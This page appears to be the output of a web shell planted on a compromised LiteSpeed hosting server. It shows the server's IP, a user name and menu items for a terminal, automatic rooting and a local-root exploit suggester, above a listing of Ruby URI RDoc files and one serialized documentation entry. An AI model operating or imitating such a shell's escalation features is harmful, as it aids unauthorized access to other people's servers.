Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.222
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
URI /
Delete
Unzip
Name
Size
Permission
Date
Action
BadURIError
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Error
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Escape
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
FTP
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Generic
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
HTTP
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
HTTPS
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
InvalidComponentError
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
InvalidURIError
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
LDAP
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
LDAPS
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
MailTo
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Parser
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
REGEXP
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
cdesc-URI.ri
5.54
KB
-rw-r--r--
2023-07-26 17:38
decode_www_form-c.ri
1.19
KB
-rw-r--r--
2023-07-26 17:38
decode_www_form_component-c.ri
503
B
-rw-r--r--
2023-07-26 17:38
encode_www_form-c.ri
1.54
KB
-rw-r--r--
2023-07-26 17:38
encode_www_form_component-c.ri
729
B
-rw-r--r--
2023-07-26 17:38
extract-c.ri
1.09
KB
-rw-r--r--
2023-07-26 17:38
join-c.ri
1.28
KB
-rw-r--r--
2023-07-26 17:38
parse-c.ri
1.04
KB
-rw-r--r--
2023-07-26 17:38
regexp-c.ri
1.25
KB
-rw-r--r--
2023-07-26 17:38
scheme_list-c.ri
310
B
-rw-r--r--
2023-07-26 17:38
split-c.ri
1003
B
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::AnyMethod[iI"decode_www_form:EFI"URI::decode_www_form;FT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"3Decode URL-encoded form data from given +str+.;To:RDoc::Markup::BlankLine o; ; [I"9This decodes application/x-www-form-urlencoded data ;TI"+and returns array of key-value array. ;TI"8This internally uses URI.decode_www_form_component.;T@o; ; [I"P_charset_ hack is not supported now because the mapping from given charset ;TI"*to Ruby's encoding is not clear yet. ;TI"Jsee also http://www.w3.org/TR/html5/syntax.html#character-encodings-0;T@o; ; [I"LThis refers http://www.w3.org/TR/html5/forms.html#url-encoded-form-data;T@o; ; [I".ary = URI.decode_www_form("a=1&a=2&b=3") ;TI"Ep ary #=> [['a', '1'], ['a', '2'], ['b', '3']] ;TI"$p ary.assoc('a').last #=> '1' ;TI"$p ary.assoc('b').last #=> '3' ;TI"$p ary.rassoc('a').last #=> '2' ;TI"5p Hash[ary] # => {"a"=>"2", "b"=>"3"};T@o; ; [I";See URI.decode_www_form_component, URI.encode_www_form;T: @fileI"lib/uri/common.rb;T:0@omit_headings_from_table_of_contents_below000[ I"(str, enc=Encoding::UTF_8);T@'FI"URI;FcRDoc::NormalModule0